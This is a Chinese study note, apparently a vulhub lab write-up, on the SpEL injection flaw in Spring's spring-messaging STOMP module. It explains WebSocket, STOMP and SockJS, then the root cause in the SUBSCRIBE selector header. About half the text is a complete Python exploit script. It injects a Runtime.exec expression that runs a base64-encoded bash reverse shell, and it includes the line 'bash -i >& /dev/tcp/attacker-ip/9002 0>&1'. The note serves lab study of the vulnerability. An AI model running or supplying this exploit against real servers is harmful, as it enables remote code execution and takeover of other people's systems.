学习时间2022.7.15!
spring-messaging
spring-messaging模块为集成messaging api和消息协议提供支持。
spring框架中通过spring-messaging模块实现STOMP(Simple Text-Orientated Messaging Protocal)-面向消息的简单文本协议.STOMP是一种封装WebSocket连接并发一条消息造成远程代码执行。STOMP为浏览器和服务器之间的通信增加适当的消息语义。
创建好环境我们看一下页面
WebSocket
WebSocket是一种数据通信协议,用于客户端和服务端数据通信。类似于http。
为啥有了http协议还需要webscket协议咧?
http通信是单向的 请求+响应 没有请求就没有响应
http协议通信只能由客户端发起 http协议无法做到服务端主动向客户端推送消息。这样子的话如果服务器有连续的状态变化,客户端就得一直询问了解。
然后就有了WebScoket!
服务器可以主动向客户端推送信息,客户端也可以主动向服务器发送消息。是真正的双向平等对话。
http和webscoket的区别:
http我问你答
webscoket双向对话
通信模型
拨号(建立连接)
通话(双向通信)
结束通话(关闭连接)
STOMP
STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它是一种在客户端与中转服务端(消息代理Broker)之间进行异步消息传输的简单通用协议,它定义了服务端与客户端之间的格式化文本传输方式。已经在被许多消息中间件与客户端工具所支持。
SockJS
一个JavaScript库,它在浏览器和Web服务器之间创建了一个低延迟、全双工、跨域通信通道。另外由于WebSocket是HTML5新增的特性,一些浏览器可能不支持,因此回退机制就很必要。SockJS就提供了该功能,即优先使用WebSocket,当浏览器不支持WebSocket时,会自动降为轮询或其他方式。
连接后端服务器流程:
1.用STOMP协议将数据流组合成一个文本流
2.用sockjs协议发送文本流,sockjs会选择一个合适的通道:websocket或者http与后端通信。
漏洞原因
Spring框架中的 spring-messaging 模块提供了一种基于WebSocket的STOMP协议实现,STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞,攻击者可以通过构造恶意的消息来实现远程代码执行。
订阅的时候插入spel表达式-向此订阅发送消息-触发命令执行
1.客户端连接进行握手,握手成功websocket连接建立,STOMP消息帧在此连接上传输。
2.客户端发送消息进行消息订阅,消息被发送然后路由到存储客户端订阅的消息代理。
3.然后经过其他操作被消息代理处理。消息代理寻找所有匹配的订阅者向订阅者发回消息。就是在这个过程会根据客户端发送的SUBSCRIBE进行消息订阅时添加的selector请求头进行过滤(过滤的是订阅者想要的信息)。
漏洞出现在这儿,如果订阅的时候发送的subscribe帧包含selector请求头,那么这里就会对selector请求头的值进行spel表达式求值。那么我只要在这儿插入恶意spel表达式就可以执行我的命令从而进行攻击。
漏洞验证
访问http://your-ip:8080/gs-guide-websocket出现如下
漏洞复现反弹shell
直接用exp进行反弹shell
先开启监听端口9002
exp:
#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
def random_str(length):
letters = string.ascii_lowercase + string.digits
return ''.join(random.choice(letters) for c in range(length))
class SockJS(threading.Thread):
def __init__(self, url, *args, **kwargs):
super().__init__(*args, **kwargs)
self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
self.daemon = True
self.session = requests.session()
self.session.headers = {
'Referer': url,
'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
}
self.t = int(time.time()*1000)
def run(self):
url = f'{self.base}/htmlfile?c=_jp.vulhub'
response = self.session.get(url, stream=True)
for line in response.iter_lines():
time.sleep(0.5)
def send(self, command, headers, body=''):
data = [command.upper(), '\n']
data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))
data.append('\n\n')
data.append(body)
data.append('\x00')
data = json.dumps([''.join(data)])
response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
if response.status_code != 204:
logging.info(f"send '{command}' data error.")
else:
logging.info(f"send '{command}' data success.")
def __del__(self):
self.session.close()
sockjs = SockJS('http://靶机ip:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)
sockjs.send('connect', {
'accept-version': '1.1,1.0',
'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,你的攻击机ip+端口base64编码}|{base64,-d}|{bash,-i}')",
'id': 'sub-0',
'destination': '/topic/greetings'
})
data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
'content-length': len(data),
'destination': '/app/hello'
}, data)
bash -i >& /dev/tcp/你的攻击机ip/9002 0>&1
这个进行base64编码
然后在服务器python3 exp.py
反弹成功!